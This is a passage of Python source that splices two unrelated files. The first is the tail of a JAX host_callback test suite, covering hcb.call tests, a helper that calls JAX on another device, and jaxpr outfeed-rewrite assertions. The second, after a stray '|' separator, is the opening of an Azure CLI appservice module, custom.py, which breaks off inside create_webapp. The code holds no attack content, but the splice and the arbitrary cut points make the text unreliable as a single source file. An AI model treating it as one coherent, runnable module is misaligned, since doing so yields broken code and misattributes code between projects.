hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(x):
return 2 * x
def fun(x):
y = hcb.call(f_outside, x + 1, result_shape=x)
return 3 * (1 + y)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(3 * (1 + 2 * (arg + 1)), fun(arg))
def test_primitive_compilation(self):
def f_outside(x):
return 2 * x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
with jtu.count_primitive_compiles() as count:
for _ in range(3):
self.assertAllClose(2 * arg, fun(arg))
self.assertEqual(count[0], 1)
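# Note: the compiled computation is cached, so the three identical calls above
# trigger exactly one compilation (hence count[0] == 1).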
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_{np.dtype(dtype).name}", dtype=dtype)
for dtype in jtu.dtypes.all
if dtype != np.bool_))
def test_call_types(self, dtype=np.float64):
def f_outside(x):
# Use x + x to ensure that the result type is the same
return x + x
def fun(x):
return hcb.call(f_outside, x + x, result_shape=x)
arg = np.arange(24, dtype=dtype).reshape((2, 3, 4))
self.assertAllClose(arg + arg + arg + arg, fun(arg), check_dtypes=True)
def test_call_types_bool(self):
def f_outside(x):
return np.invert(x)
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = self.rng().choice(a=[True, False], size=(2, 3, 4))
self.assertAllClose(np.invert(arg), fun(arg))
def test_call_tuples(self):
def f_outside(args):
x, y = args
return y, x # Swap the tuple
def fun(x):
xy = hcb.call(f_outside, (x, x + 1), result_shape=(x, x))
return 2 * xy[0] + 3 * xy[1]
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(2 * (arg + 1) + 3 * arg, fun(arg))
def test_call_empty_arg(self):
"""Call with empty array."""
result = np.ones((2,), dtype=np.float32)
def f_outside(_):
return result
def fun(x):
return x + hcb.call(f_outside, (),
result_shape=jax.ShapeDtypeStruct(result.shape, result.dtype))
self.assertAllClose(2. + result, fun(2.))
def test_call_empty_result(self):
"""Call returning empty array."""
result_shape = (2, 0)
def f_outside(_):
return np.ones(result_shape, dtype=np.float32)
def fun(x):
return x + hcb.call(f_outside, 1.,
result_shape=jax.ShapeDtypeStruct(result_shape, np.float32))
self.assertAllClose(f_outside(0.), fun(2.))
def test_call_empty_result_inside_pytree(self):
"""Call returning a tuple with an empty array and a non-empty one."""
result_shape_0 = (2, 0)
result_shape_2 = (0,)
def f_outside(_):
return (np.ones(result_shape_0, dtype=np.float32),
np.ones((1,), dtype=np.float32),
np.ones(result_shape_2, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape_0, np.float32),
jax.ShapeDtypeStruct((1,), np.float32),
jax.ShapeDtypeStruct(result_shape_2, np.float32)))
self.assertEqual(result_shape_0, res[0].shape)
self.assertEqual(result_shape_2, res[2].shape)
return x + res[1]
self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))
def test_call_empty_result_all_pytree(self):
"""Call returning a tuple of empty arrays."""
result_shape = (2, 0)
def f_outside(_):
return (np.ones(result_shape, dtype=np.float32),
np.ones(result_shape, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape, np.float32),
jax.ShapeDtypeStruct(result_shape, np.float32)))
return x + res[0] + res[1]
self.assertAllClose(np.ones(result_shape, dtype=np.float32),
fun(2.))
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, jax.jit(loop)(1.2))
def test_call_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = jax.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_call_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=jax.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
@jtu.skip_on_devices("gpu")
def test_call_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function."""
def fun1(m):
return jnp.sin(hcb.call(lambda x: np.cos(x),
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun1, m)
def fun2(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun2, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(len(local_devices()), dtype=jnp.int32)
res = jax.pmap(fun)(xv)
self.assertAllClose(jax.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError,
"batching rules are implemented only for id_tap, not for call"):
jax.vmap(fun)(np.ones((2, 3)))
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_call_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_call_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
def callback_x5_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(5, np.int32)
def fun(x):
xy = jnp.dot(x, y)
return hcb.call(
callback_x5_func, xy, result_shape=xy, call_with_device=True)
pjit_fun = pjit.pjit(
fun, in_axis_resources=(P("d"),), out_axis_resources=P("d"))
with maps.Mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun,
x,
num_partitions=nr_devices)
res = pjit_fun(x)
expected_res = jnp.dot(x, y) * np.array(5, np.int32)
self.assertAllClose(expected_res, res, check_dtypes=False)
hcb.barrier_wait("before assertion")
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0
Called with [[ 3 3 3 3]
[33 33 33 33]]""")
def test_call_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_call_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_call_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_call_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return jax.jit(jax_outside_fun)(jax.device_put(arg, device))
@jax.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=jax.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = jax.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
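# A minimal usage sketch (assuming a second device, e.g. a CPU, is available;
# the tests below follow the same patterns):
#   outside = jax.devices("cpu")[0]
#   y = call_jax_other_device(jnp.sin, 3.0, device=outside)
#   dy = jax.grad(lambda x: call_jax_other_device(jnp.sin, x, device=outside))(3.0)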
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
if jtu.device_under_test() != "cpu":
assert jax.devices("cpu")
self.outside_device = jax.devices("cpu")[0]
else:
if len(jax.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = jax.devices("cpu")[1]
super().setUp()
def test_jax_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), jax.jit(f_outside)(3.))
def test_jax_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {jax.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_jax_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = jax.grad(f_jax)(3.)
self.assertAllClose(res_jax, jax.grad(f_outside)(3.))
def test_jax_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = jax.grad(f_jax)(x)
self.assertAllClose(res_jax, jax.grad(f_outside)(x))
def test_jax_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = jax.grad(jax.grad(f_jax))(5.)
res_outside = jax.grad(jax.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = jax.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
# Since it is somewhat annoying to update the Jaxpr assertions when we change
# the Jaxpr printing, we do not check these by default. Before making changes
# to the code generation or the Jaxpr rewriting, it is recommended to turn on
# the checking, update the expected Jaxprs, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
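# Note: since id_print is an identity, f(x) = x * x; the tangent rule above
# deliberately returns 3. * x * x_dot rather than the true derivative
# 2. * x * x_dot, which makes it observable that the custom rule actually ran.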
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b g h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, jax.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c g h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
jax.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = sin b
in (c, f, g) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (InvalidArgumentValueError, MutuallyExclusiveArgumentError, ResourceNotFoundError,
RequiredArgumentMissingError, ValidationError, CLIInternalError,
UnclassifiedUserFault, AzureResponseError, AzureInternalError,
ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_tier,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager, use_additional_properties, get_app_service_plan_from_webapp,
get_resource_if_exists)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
from ._validators import validate_and_convert_to_int, validate_range_of_int_flag
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
from azure.mgmt.web.models import Site
SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'NameValuePair')
if deployment_source_url and deployment_local_git:
